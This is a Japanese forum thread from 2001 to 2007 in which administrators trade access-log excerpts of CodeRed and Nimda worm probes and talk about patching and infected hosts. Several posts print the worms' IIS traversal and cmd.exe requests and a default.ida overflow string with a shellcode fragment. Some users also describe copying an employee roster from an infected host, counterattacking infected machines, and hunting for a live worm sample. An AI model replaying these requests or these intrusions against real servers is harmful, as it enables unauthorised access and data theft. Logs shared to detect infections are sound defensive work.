ねーねー。 CodeRedに感染してるホストに、FTPでAnonymousログインして、 ちらちら見て回ったら、それは犯罪になるの?
759>> Anonymousで”公開”しているFTPサーバーに入っても 犯罪にはならないでしょう。 Anonymous = だれでもアクセスOKヨ!
>>760 レスさんきゅっ!
でも、なんか会社の社員名簿とか、あからさまに公開しちゃマズそうなもの
ばっかりだったよ?
韓国のとこだったけど。こあいから、すぐ閉じちった。
名簿はDLしちゃったけど・・(ワラ
CodeRedに感染すると、各サービスのアクセス制限とか全部はずされちゃうの?
>>743 うちにも「ポートを塞いでいるだけ」に見えるCodeRedが
来るようになった。うざいなぁ。
>>761 そんな事はない。
パッチも当てられない管理者は、必要の無いタスクを落とす事も出来ない
とゆーだけでしょう。
>>762 うちのルータにも外部から設定画面入れる機能がある.
もちろん,指定Sourceアドレス以外は蹴るようになってるんだが.
>>762 遠隔設定が出来るルータにパスワード設定し忘れているだけと思われ
767 :
名無しさん@お腹いっぱい。 :01/09/14 22:25
それにしてもぜんぜんおさまらんのだね・・ こんだけ時間も経って情報も広まってんのに
769 :
名無しさん@お腹いっぱい。 :01/09/15 11:07
ageついでに CRcleanのバイナリはないのかな
ウチは未だに一日平均260〜270レッド。 8月初頭のピーク時で500〜800レッドだった。
771 :
名無しさん@お腹いっぱい。 :01/09/15 11:35
反省汁ってどんな汁?
えーん氏、 さんくす!!
アメリカに行ってきた。 テロで飛行機が飛ばなくなった。 なんとか帰国した。 おみやげはもちろん Mountain Dew CODE RED だだだだっ。
赤蟲ワッショイと踊りながら攻撃をしかけたくなるような味です。
台湾政府から来るんだけどー
779 :
名無しさん@お腹いっぱい。 :01/09/18 17:14
780 :
名無しさん@お腹いっぱい。 :01/09/18 20:04
今、中国(?)からアタックがあったんでチラッっとアタック先のPC覗いてみたら そのパソコンのアクセスログにこんなのあった。 2001-09-18 08:51:29 61.123.*.* - 61.182.*.* 80 HEAD /Warning!-You-may-be-infected-with-CodeRed! - 404 CodeRedCapture/1.0 やるねぇODNの人(w これはCGIでやったのかな?
781 :
名無しさんに接続中… :01/09/18 21:25
782 :
名無しさん@お腹いっぱい。 :01/09/18 22:40
さっきからこんなシグネチャのが来てるんですがCodeRedの変種? いまんとこsrc-ipはuniqで5つぐらい。相手は全部IIS4す。 GET /scripts/root.exe?/c+dir HTTP/1.0" 404 280 "-" "-" GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 278 "-" "-" GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 288 "-" "-" GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 "-" GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir H TTP/1.0" 404 319 "-" "-"
>782 来てます来てます、韓国ばっかですけど。 せっかく /Scripts/root.exeでアクセスできる CGIを用意して待ってたのに アクセスパターンが 変わってがっかりしました
うちにも22:30から毎分きてる ただ,782さんより試行がずっと多い
782です。 乗っけたシグネチャは全部ではないので、皆さんの トコに来てるのと同じとおもいます。 srcはuniqでもProbeは同じパターンなので新種のwarmっぽいですね
786 :
名無しさん@お腹いっぱい。 :01/09/18 22:57
うちにも22:34にまさぐりに来てます。 なんかごそごそまさぐってて気持ち悪いんですけど… 新種のworm?
787 :
名無しさん@お腹いっぱい。 :01/09/18 22:59
あぁ CodeRed自体の変種の可能性もあるのか。。
kazumu.as.wakwak.ne.jp と 61.147.112.72
が
>>782 と同じ感じに探ってたから、今反撃してんだけど
辞めた方が良いかな。
つか、kazumu.as.wakwak.ne.jp って何?
一部載せとくのも何なので一部伏字で。 ちょっと前に出ていたCode Blue Warmってのとは違うのでしょうかね -- adslxxx2-xxxx.hi-ho.ne.jp - - [18/Sep/2001:22:41:55 +0900] "GET /scripts/root.ex e?/c+dir HTTP/1.0" 404 280 "-" "-" adslxxx2-xxxx.hi-ho.ne.jp - - [18/Sep/2001:22:41:55 +0900] "GET /MSADC/root.exe? /c+dir HTTP/1.0" 404 278 "-" "-" adslxxx2-xxxx.hi-ho.ne.jp - - [18/Sep/2001:22:41:56 +0900] "GET /c/winnt/system3 2/cmd.exe?/c+dir HTTP/1.0" 404 288 "-" "-" adslxxx2-xxxx.hi-ho.ne.jp - - [18/Sep/2001:22:41:56 +0900] "GET /d/winnt/system3 2/cmd.exe?/c+dir HTTP/1.0" 404 288 "-" "-" adslxxx2-xxxx.hi-ho.ne.jp - - [18/Sep/2001:22:41:56 +0900] "GET /scripts/..%255c ../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 "-" "-" adslxxx2-xxxx.hi-ho.ne.jp - - [18/Sep/2001:22:41:56 +0900] "GET /_vti_bin/..%255 c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 319 "-" "-" adslxxx2-xxxx.hi-ho.ne.jp - - [18/Sep/2001:22:41:57 +0900] "GET /_mem_bin/..%255 c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 319 "-" "-" adslxxx2-xxxx.hi-ho.ne.jp - - [18/Sep/2001:22:41:57 +0900] "GET /msadc/..%255c.. /..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+di r HTTP/1.0" 404 335 "-" "-" adslxxx2-xxxx.hi-ho.ne.jp - - [18/Sep/2001:22:41:58 +0900] "GET /scripts/..%c1%1 c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301 "-" "-" adslxxx2-xxxx.hi-ho.ne.jp - - [18/Sep/2001:22:41:58 +0900] "GET /scripts/..%c0%2 f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301 "-" "-" adslxxx2-xxxx.hi-ho.ne.jp - - [18/Sep/2001:22:42:02 +0900] "GET /scripts/..%c0%a f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301 "-" "-" adslxxx2-xxxx.hi-ho.ne.jp - - [18/Sep/2001:22:42:02 +0900] "GET /scripts/..%c1%9 c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301 "-" "-" adslxxx2-xxxx.hi-ho.ne.jp - - [18/Sep/2001:22:42:02 +0900] "GET /scripts/..%%35% 63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 285 "-" "-" adslxxx2-xxxx.hi-ho.ne.jp - - [18/Sep/2001:22:42:03 +0900] "GET /scripts/..%%35c ../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 285 "-" "-" adslxxx2-xxxx.hi-ho.ne.jp - - [18/Sep/2001:22:42:03 +0900] "GET /scripts/..%25%3 5%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 "-" "-" adslxxx2-xxxx.hi-ho.ne.jp - - [18/Sep/2001:22:42:06 +0900] "GET /scripts/..%252f ../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 "-" "-"
はじめてきましたよ これ WWW - - [18/Sep/2001:22:53:20 +0900] "GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 218 WWW - - [18/Sep/2001:22:53:21 +0900] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 218 WWW - - [18/Sep/2001:22:53:24 +0900] "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 218 WWW - - [18/Sep/2001:22:53:25 +0900] "GET /msadc/..%5c../..%5c../..%5c/..チ../..チ../..チ../winnt/system32/cmd.exe HTTP/1.0" 404 218 WWW - - [18/Sep/2001:22:53:26 +0900] "GET /scripts/..チ../winnt/system32/cmd.exe HTTP/1.0" 404 218 WWW - - [18/Sep/2001:22:53:26 +0900] "GET /sc?/c+dir HTTP/1.1" 404 218 WWW - - [18/Sep/2001:22:51:59 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.1" 404 257
791 :
名無しさん@お腹いっぱい。 :01/09/18 23:06
>782 うちにもいっぱい来てる!! co.jpとne.jpが多いね。殆どがまだ、日本国内から。
すごいなー不正アクセスされぱなしだ どうなってんの?
まじでやばそうよ!
ニュース版でほうこくしたら?
795 :
名無しさん@お腹いっぱい。 :01/09/18 23:08
ちなみに動作内容はなんなの? 未だにCodeRedに感染する様な奴は二度とリブートさせんぜよ! って感じの内容なら作成者褒めたげるんだけど。
796 :
名無しさん@お腹いっぱい。 :01/09/18 23:10
うーん、テスト用にさらしてたPCがやられちゃった。 至る所にreadme.emlが出来てた。 テキストエディタで見てみたら、どうやら開くと何かのMovieが開くようだ。 見てみたい…
うちにも来てるんですけど噂のCode Blueなんですか? 61.151.230.** - - [18/Sep/2001:23:09:27 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 325 61.151.230.** - - [18/Sep/2001:23:09:28 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 325 61.151.230.** - - [18/Sep/2001:23:09:32 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325
ほんとうだ新型がきだしたよ
800 :
名無しさん@お腹いっぱい。 :01/09/18 23:15
今日は明らかに多いですね。これが噂のCode Blueか?
[Tue Sep 18 22:36:21 2001] [error] [client 61.77.94.***] File does not exist: scripts/root.exe ずいぶん 来てます。
802 :
名無しさん@お腹いっぱい。 :01/09/18 23:18
あーあ、また無意味なログ肥大化だよ、実害ないけどさ・・ パッチ適用していないアホドモはどうして減らないのだ?
804 :
名無しさん@お腹いっぱい。 :01/09/18 23:21
805 :
仕様無しさん ◆NwLv.g/w :01/09/18 23:21
来まくってるよ...もう32個所から。 *sigh*
806 :
名無しさん@お腹いっぱい。 :01/09/18 23:21
まったく、やれやれって感じだ・・・
CodeRedに感染してる厨房は今度の新型にも感染してるような… ま、apacheだからどうでもいいけどさっ!
203.***.***.*** からでした やっとおさまったようです
809 :
名無しさん@お腹いっぱい。 :01/09/18 23:36
Win厨管理者、、まじで逝ってよしだから。 いや、前回でこりたんじゃないの>Win厨 勘弁してよ>Win厨 NTとか2000とか使うかよ?ちょっとはPCに興味あるんだろ? だったらM$製品なんて使うなボケ。カス。まじでウセロ。
未だ収束せず。 ログがお祭り状態っす (藁 おいコラ、NT屋!いいかげん何とかせい!
811 :
これって?? :01/09/18 23:42
ひょっとして、凄まじい連続アタックなのですか? どうなんでしょう? 非常に気分悪いです。 アパッチのログなんですが、1時間ほどで軽く1000行越えますが。。。 "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 271 "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 271 "-" "-" "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 269 "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 269 "-" "-" "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 279 "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 279 "-" "-" "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 279 "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 279 "-" "-" "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 293 "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 293 などなど続く… てっきりわざとかと思ってたんですが、これってCode Blue??
>809 すみません逝ってきます。 WIN2k+Apacheですけど、どんな穴があるかもや知れませんのでしばらくはサービス停止しておきます。 つーかM$、魔事務化(怒 不良品売りつけんな
813 :
名無しさん@お腹いっぱい。 :01/09/18 23:43
黙らせると犯罪なの?
うちさ、インターリンクなんだけど、 前回のときもそうだったんだけど、セグメントごと 混み混みになっちゃうんだよね。 だから同じセグメントにNTがいたりすると遅くて遅くて。。 なんとかなんないの??
815 :
名無しさん@お腹いっぱい。 :01/09/18 23:47
インターリンクのサポートにログ晒せば?
気軽に亀レスしてしまったのですが、そろそろ 話題まとめる為にも誰か、新スレ立てていただけませんか?
>>815 おうよ。
それ前回やって苦情電話もした。
そのせいかどうか知らないけど、どうやらNTユーザを
強制切断したみたいだよ。
ところで…ていうか、なんかきてるよ、新種!うちはFreeBSDなんですが、22:30から、きまくってます!root.exeとか、探すんじゃネエ!って感じですが、いいかげんにしてほしい…今回はうちで鯖が本稼動してるんで、あした会社に行ってログみるのが鬱だ詩嚢…
うちはOCNなんだけど、ダイアルアップ臭い奴からもきてるのねん。 サポートにログ晒しても…OCNだし(ワラ はぁ…
連続スマソ… いい忘れてた、誰か新スレ立てて!
つーか2KのHDD消去してくれればいいのに・・・>Code Blue
822 :
怖くなった :01/09/18 23:55
あ〜〜〜、新しい発言もなく、皆様と同じです、アパッチへ 無効root.exe 以下省略アタック。 午後10時半からです。すげぇいきおい。新スレッドキボン。 むちゃくるねぇ〜、CodeREDの影響なのかなぁ。Xデイだったのでしょうかね。 ida 一回のとはわけが違うのでウザイ。
823 :
名無しさん@お腹いっぱい。 :01/09/18 23:58
あーーーーーー 遅ーーーーーーえーーーーーーーーーーー! なんとかしてくれ========= NTとめろ 2000とめろ この世はUNIXだけで成り立つべきだーーーーーー。
824 :
名無しさん@お腹いっぱい。 :01/09/18 23:59
前に作ったCode Redのログ分離ツールは GET /def で 判断するだけで済んだけど、Code Blueの分離はなんか めんどそうだなー
825 :
名無しさん@お腹いっぱい。 :01/09/19 00:01
>>824 .exe?/c+dir HTTP/1.0 でどうよ?
ここでさらしてよかですか?
827 :
名無しさん@お腹いっぱい。 :01/09/19 00:03
鬱だ… 見なかったことにして帰ろうっと♪
828 :
名無しさん@お腹いっぱい。 :01/09/19 00:01
うちもすんげー来る、腹立つ まわりに NT+IIS 使ってるところないからよくわからんけど これって codered の穴ふさいであってもやられるの?
829 :
名無しさん@お腹いっぱい。 :01/09/19 00:03
スレ立てたよ
830 :
名無しさん@お腹いっぱい。 :01/09/19 00:04
うちもすんげー来る、腹立つ まわりに NT+IIS 使ってるところないからよくわからんけど これって codered の穴ふさいであってもやられるの?
831 :
名無しさん@お腹いっぱい。 :01/09/19 00:04
832 :
名無しさん@お腹いっぱい。 :01/09/19 00:05
>828 やられました はぁ これじゃ厨房ですよ (c)TBS
まじで行数が多すぎる
塞いであってもパケットは容赦なくとんでくる
Nimda 騒動でこのスレ下がったけど、 CodeRedまだ収まってないよ。。。。
ときどきNimdaログに混じってCodeRedログが発見される
NimdaとCodeRed両方のhttpアクセスとばしてきてるサイトがある。 注意してやろうかと思って、メールしようと思ったら、、 そこのドメインってDNSでmxレコードが設定されない。。。。。 ところで、試しにそこのマシンに25番ポートをつつくと MSのSMTPが応答する。 1.外部メール交換したくないなら、自営ドメインを何故たてる? 2.なんで25番をあけたままにする。? こういう運用をしている人たちがいるから感染広がるだろうね。
840 :
なんとかして :01/09/24 04:29
[2001/09/24 3:51:54] CodeRed Type XXXXX from: 210.136.65.xx / g065018.ap.plala.or.jp [2001/09/24 3:55:59] --unknown-- from: 202.132.46.xx / [2001/09/24 3:56:04] --unknown-- from: 202.132.46.xx / [2001/09/24 3:56:10] --unknown-- from: 202.132.46.xx / [2001/09/24 3:56:16] --unknown-- from: 202.132.46.xx / [2001/09/24 3:56:23] --unknown-- from: 202.132.46.xx / [2001/09/24 3:56:28] --unknown-- from: 202.132.46.xx / [2001/09/24 3:56:34] --unknown-- from: 202.132.46.xx / [2001/09/24 3:56:39] --unknown-- from: 202.132.46.xx / [2001/09/24 3:56:45] --unknown-- from: 202.132.46.xx / [2001/09/24 3:56:51] --unknown-- from: 202.132.46.xx / [2001/09/24 3:56:57] --unknown-- from: 202.132.46.xx / [2001/09/24 3:57:02] --unknown-- from: 202.132.46.xx / [2001/09/24 3:57:53] --unknown-- from: 202.132.46.xx / [2001/09/24 3:57:58] --unknown-- from: 202.132.46.xx / [2001/09/24 3:58:04] --unknown-- from: 202.132.46.xx / [2001/09/24 3:58:10] --unknown-- from: 202.132.46.xx / [2001/09/24 4:22:22] --unknown-- from: 202.16.214.xx / nihei.ph.sci.toho-u.ac.jp [2001/09/24 4:22:23] --unknown-- from: 202.16.214.xx / nihei.ph.sci.toho-u.ac.jp [2001/09/24 4:22:23] --unknown-- from: 202.16.214.xx / nihei.ph.sci.toho-u.ac.jp [2001/09/24 4:22:23] --unknown-- from: 202.16.214.xx / nihei.ph.sci.toho-u.ac.jp [2001/09/24 4:22:24] --unknown-- from: 202.16.214.xx / nihei.ph.sci.toho-u.ac.jp [2001/09/24 4:22:24] --unknown-- from: 202.16.214.xx / nihei.ph.sci.toho-u.ac.jp [2001/09/24 4:22:25] --unknown-- from: 202.16.214.xx / nihei.ph.sci.toho-u.ac.jp [2001/09/24 4:22:25] --unknown-- from: 202.16.214.xx / nihei.ph.sci.toho-u.ac.jp [2001/09/24 4:22:26] --unknown-- from: 202.16.214.xx / nihei.ph.sci.toho-u.ac.jp [2001/09/24 4:22:26] --unknown-- from: 202.16.214.xx / nihei.ph.sci.toho-u.ac.jp [2001/09/24 4:22:27] --unknown-- from: 202.16.214.xx / nihei.ph.sci.toho-u.ac.jp [2001/09/24 4:22:27] --unknown-- from: 202.16.214.xx / nihei.ph.sci.toho-u.ac.jp [2001/09/24 4:22:28] --unknown-- from: 202.16.214.xx / nihei.ph.sci.toho-u.ac.jp [2001/09/24 4:22:28] --unknown-- from: 202.16.214.xx / nihei.ph.sci.toho-u.ac.jp [2001/09/24 4:22:29] --unknown-- from: 202.16.214.xx / nihei.ph.sci.toho-u.ac.jp [2001/09/24 4:22:29] --unknown-- from: 202.16.214.xx / nihei.ph.sci.toho-u.ac.jp
841 :
名無しさん@お腹いっぱい :01/09/24 04:53
>840 なんとかって、言われても伏せ字 XX じゃだめじゃないのか? あっ、でもあとみえるね。やっちゃいましょうか?
842 :
アナログから光までオッケー :01/09/24 16:39
>>839 単にDNSにMXレコード書いてないだけでメールサーバは
普通に動いてるんなら届くんでないの?
なんかこっちの方が落ち着くなあ 今度IBMのノート買ってしまったYO
CodeRedだっておさまってねえ。 nimdaだってCodeRedと無関係ではない で age とくよ
CodeRed おさまらないので age
うちにもよく来るのでsage
もうすぐ 9月と10月の境目。。 ここでおさまるのか?
850 :
名無しさん@お腹いっぱい。 :01/09/29 22:13
>>849 そういう説があるけど、信頼できる話なの?(^^;
852 :
名無しさん@お腹いっぱい。 :01/10/01 11:20
うちは確かに 10/1 04:00 (JST) 以降は "XXX" が来てない。 おさまった?
[01/Oct/2001:07:07:01 +0900] "GET /default.ida?XXXXX・・・ うちはこれが最後だな
終わったみたいだね。 しかし16倍うるさいのが来るようになっちゃってるからなあ。
8:44 にきて しばらく来ないので収まったと思ったら 14:43にきて 17:26にもきた。 10月1日云々というのが汚染マシンのローカルカレンダ見ての 振る舞いだったらカレンダ狂ってるマシンあれば 何日になってもくるのではないかいな。。
ハワイはもう10/1になっているかな?
211.242.80.33 - - [01/Oct/2001:14:43:12 +0900] 211.237.226.184 - - [01/Oct/2001:17:26:35 +0900] 211.225.158.6 - - [01/Oct/2001:23:22:43 +0900] 211.186.93.243 - - [02/Oct/2001:00:31:30 +0900] 211.222.226.249 - - [02/Oct/2001:00:45:51 +0900] 211.222.226.249 - - [02/Oct/2001:00:49:38 +0900] 211.96.111.55 - - [02/Oct/2001:01:49:07 +0900] " 10月2日になってもまだあるな。。。
うちは 202.103.99.190 - - [01/Oct/2001:06:18:56 +0900] が最後。
859 :
名無しさん@お腹いっぱい。 :01/10/02 18:36
61.138.94.57 - - [01/Oct/2001:07:06:04 +0900] うちはコイツだな。 見に行ったらNimdaにも感染してたよ。
860 :
(゚Д゚) :01/10/03 14:03
あのさ、コードレッドの中身っぽい題名なしテキストメールが届いたんだけど、 なんかの仕業?新型ですか?
861 :
(゚Д゚) :01/10/03 14:05
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX > > 〜中略〜 > XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX > > > XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX > > XXXXXXXXXX > > > %`;vL36I こんなの。
862 :
(゚Д゚) :01/10/03 14:22
反応なしってことは、みんな知らないってことか。 誰かのイタズラか?
863 :
(゚Д゚) :01/10/03 14:35
もしかして、NIMDA?
864 :
名無しさん@お腹いっぱい。 :01/10/03 15:16
CodeRed2だよ
From :
[email protected] Reply-To :
[email protected] To :
[email protected] Subject : Do you owe the IRS money? [l5db4]
Received: from [199.233.104.147] by hotmail.com (3.2) with ESMTP id MHotMail***; *, * * 2001 **:**:** -0700
Received: from tkwof.msn.com (wc-client01.ntelos.net [216.12.96.66]) by mandan.combination.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2650.21)id TYM3YP85; Tue, 2 Oct 2001 16:43:15 -0500
From
[email protected] Tue, 02 Oct 2001 14:50:04 -0700
viking.combination.com (pri=10)
<<< 220 mandan.combination.com ESMTP Server (Microsoft Exchange Internet Mail Service 5.5.2650.21) ready
>>> HELO rlytest.nanet.co.jp
<<< 250 OK
>>> MAIL FROM:< TEST
http://www.nanet.co.jp/rlytest/ requested from
[email protected] >
<<< 250 OK - mail from < TEST
http://www.nanet.co.jp/rlytest/ requested from
[email protected] >
>>> RCPT TO:<
[email protected] >
<<< 250 OK - Recipient <
[email protected] >
>>> QUIT
<<< 221 closing connection
問題あり:不正な中継を受け付けます。
(199.233.104.147)
ORBS database...登録されていません。
VIX realtime block list...登録されていません。
866 :
(゚Д゚) :01/10/03 15:38
>>864 さん
CodeRed2はメール出すの?
867 :
名無しさん@お腹いっぱい。 :01/10/04 08:08
868 :
(゚Д゚) :01/10/04 11:52
>> 867 え?どう意味? 「おまえそんなことも知らないの?ワラタ」 って意味?? だったら、恥ずかしい、モジモジ。
>>868 メールは出さないはず、確か。
で、861のメールの正体は分かったの?
漏れもよく分からないんだが。
「…こんなログが残ってるんですけど
何?」っていうメールを書いている
途中に送信しちゃったとか?
870 :
(゚Д゚) :01/10/04 12:17
>>869 ですよねー!!(ホッ。。
多分そんな感じだと思うんですけど、、(人為的なミス
取引先から言われて調べてるんですが、
ヘッダみたいからメール頂戴っていったら、
もう消しちゃったって。どうにもなんねッス。
なんかわかったら、報告入れます。
871 :
名無しさん@お腹いっぱい。 :01/10/07 00:03
あちこちで反省汁ってたま〜に見るね。 地味に流行ってる?w
872 :
名無しさん@お腹いっぱい。 :01/10/07 00:45
最近、ノートンのログに1つか2つだけhttpが記録されてるけど、これはニムダ? コードレッドの時は3回連続で記録されてたが…
>>871 反省汁は速報板で急激に流行たけど何か?
874 :
名無しさん@お腹いっぱい。 :01/10/08 21:55
875 :
名無しさん@お腹いっぱい。 :01/10/09 12:17
なんか codered 全然来ないんすけど。ここ数日 因みに、ウチの最初のオクテットと同じ cn,kr,tw,hk をはじいてます。 ちょっとさびしい...
そろそろ、引越したいが、スレ立てすぎとかいわれたし鬱だ
879 :
名無しさん@お腹いっぱい。 :01/10/14 02:31
>>878 ううう・・・。
213.179.221.137
ウチも久しぶりに今日一発来ました。 懐かしいね、おーよしよしって感じ。
881 :
名無しさん@お腹いっぱい。 :01/10/16 21:22
882 :
名無しさん@お腹いっぱい。 :01/10/19 20:21
ウイルス関連のカキコも、注意も減っている・・。 こんなときが危ないんだよ。コードレッドのあと、ニムダが発生する直前のようだ・・。
883 :
ERROR:名前いれてちょ。。。 :01/10/19 21:28
884 :
名無しさん@お腹いっぱい :01/10/27 01:50
age age
そういえば亜種の話も聞かなくなったなあ・・・ がむばれハカー
>>885 XP出るの待ってるんじゃないの??
そいえば、マックOS-X版のIE5.1にバグ出たね。
MS01-053だって。。
保守
まもなくここは 乂1000取り合戦場乂 となります。 \∧_ヘ / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ,,、,、,,, / \〇ノゝ∩ < 1000取り合戦、いくぞゴルァ!! ,,、,、,,, /三√ ゚Д゚) / \____________ ,,、,、,,, /三/| ゚U゚|\ ,,、,、,,, ,,、,、,,, ,,、,、,,, U (:::::::::::) ,,、,、,,, \オーーーーーーーッ!!/ //三/|三|\ ∧_∧∧_∧ ∧_∧∧_∧∧_∧∧_∧ ∪ ∪ ( ) ( ) ( ) ) ,,、,、,,, ,,、,、,,, ∧_∧∧_∧∧_∧ ∧_∧∧_∧∧_∧∧_∧ ,,、,、,,, ( ) ( ) ( ) ( )
889 :
AN HTTPD :02/02/09 12:23
まだ、いました。 [09/Feb/2002:01:23:19 +0900] "GET /default.ida?NNNNNNNNN...NNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 214
全部Nタイプ アドレスからみても初代っぽいけど DoSするのかなあ? 202.29.*.* - - [07/Feb/2002:07:00:58 +0900] "GET /default.ida?NNNNNNNNNNNNNNN 202.201.*.* - - [08/Feb/2002:11:18:33 +0900] "GET /default.ida?NNNNNNNNNNNNNN 155.54.*.* - - [09/Feb/2002:05:40:32 +0900] "GET /default.ida?NNNNNNNNNNNNNNNNN 80.63.*.* - - [10/Feb/2002:00:31:02 +0900] "GET /default.ida?NNNNNNNNNNNNNNN 61.157.*.* - - [10/Feb/2002:10:21:38 +0900] "GET /default.ida?NNNNNNNNNNNNNN 148.243.*.* - - [10/Feb/2002:12:09:00 +0900] "GET /default.ida?NNNNNNNNNNNNNN 210.181.*.* - - [10/Feb/2002:15:23:31 +0900] "GET /default.ida?NNNNNNNNNNNNNN
急に目につくようになりました 誕生一周年記念で復活ですか? 61.171.*.* - - [07/Jul/2002:05:40:36 +0900] "GET /default.ida?NNNNNNNNNNNNNN 207.208.*.* - - [08/Jul/2002:06:46:10 +0900] "GET /default.ida?NNNNNNNNNNNNN 193.50.*.* - - [08/Jul/2002:07:34:56 +0900] "GET /default.ida?NNNNNNNNNNNNNN 210.82.*.* - - [08/Jul/2002:14:05:29 +0900] "GET /default.ida?NNNNNNNNNNNNNN 198.4.*.* - - [08/Jul/2002:16:59:10 +0900] "GET /default.ida?NNNNNNNNNNNNNNN 211.255.*.* - - [08/Jul/2002:23:48:10 +0900] "GET /default.ida?NNNNNNNNNNNNN
.∧_∧ / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄\ ( ´∀`)< お前らまだやってんのかよ | . \____________/
懐かしいなあ
月日だけ見てるのか。 つことは1年間潜伏?ウヒー
Apacheワームじゃないの?
なんでApache狙うのにdefault.idaを叩くんだよ
最期に記念カキコ
898 :
名無しさん@お腹いっぱい。 :02/07/17 23:07
今日は多かったのでここに来てみた。 そうか、もう一周年になるのか。 再流行したりすると、またログが大変なことになるなー。
この板が残ってるなんてちょっと感動
CodeRedか..... 夏だな
901 :
名無しさん@お腹いっぱい。 :02/07/24 13:47
あれは去年の夏だったか懐かしいな まだダイヤルですごい重かったんだな
902 :
I S O T K :02/07/25 12:38
903 :
名無しさん@お腹いっぱい。 :02/08/30 11:48
この板が残ってるなんてちょっと感動
そんなことで感動できる単純な人間でよかったね。
906 :
サンプル特集 :02/08/30 20:56
お〜 おれの立てたスレがまだ生きてた。 1年以上前なんだなぁ。
なかなか消えないね〜このスレ。 と密かに書いてみるテスト・・・
1000まで誰も気がつかないかなと言ってみる テスト。。。
なかなかdat落ちしないねぇ
911 :
名無しさん@お腹いっぱい :02/12/04 17:32
私は、CodeRedUを研究していますが上手にいきません。
環境を整えても、パケットを吐いてくれないのですがどうすればよいのですか? それとも、
私が持っているCodeRedUがだめなのかもしれません。だとしたら
どこで、てに入れる事が出来ますか?ちなみに、私はここで手に入れました。
http://ring2.host.sk/page1.php
912 :
( ・_・)y─~~~ :02/12/04 17:39
codeRedUの網 何処が張ってるの? port閉じたら落ちたけど、ICEで検出されてなかった...
(^^)
(^^)
(^^)
(^^)
∧_∧ ( ^^ )< ぬるぽ(^^)
∧_∧ ピュ.ー ( ^^ ) <これからも僕を応援して下さいね(^^)。 =〔~∪ ̄ ̄〕 = ◎――◎ 山崎渉
まだあった。。。
__∧_∧_ |( ^^ )| <寝るぽ(^^) |\⌒⌒⌒\ \ |⌒⌒⌒~| 山崎渉 ~ ̄ ̄ ̄ ̄
∧_∧ ∧_∧ ピュ.ー ( ・3・) ( ^^ ) <これからも僕たちを応援して下さいね(^^)。 =〔~∪ ̄ ̄ ̄∪ ̄ ̄〕 = ◎――――――◎ 山崎渉&ぼるじょあ
Tsinghua Universityとか Shandong Universityとかから 来るようになった
(⌒V⌒) │ ^ ^ │<これからも僕を応援して下さいね(^^)。 ⊂| |つ (_)(_) 山崎パン
2年目ですなー
まぬけな福田官房長官は逝ってよし。
927 :
名無しさん@お腹いっぱい。 :03/11/23 14:26
もう政治家や官僚は私腹をこやす、売国で儲けることしかしないし モラル無き儲けさえすればいいとの経営陣 もはや日本は国として機能していない 意味の無いやつらに仕切られる筋合いはないので 地域でコミュニティーを作り 行政や警察に頼らない個人個人が武装した自治生活をするべきである もはやこういう個人武装して自分の身を守る社会に 日本はなっている 意味の無い、きちんと国民のためにならない政府に 各個人は見切りをつけるべきである
928 :
名無しさん@お腹いっぱい。 :05/01/13 18:50:19
あげ
さげ
930 :
名無しさん@お腹いっぱい。 :2005/07/07(木) 08:54:44
あげ
さげ
932 :
名無しさん@お腹いっぱい。 :2006/06/03(土) 10:58:51
りりっりりりりりりりりりり
さげ
934 :
名無しさん@お腹いっぱい。 :2007/04/22(日) 18:40:00
m9(^Д^)プギャーーーッ
CodeRedのスレあったのか…
936 :
名無しさん@お腹いっぱい。 :2007/10/04(木) 14:47:15
あげ
937 :
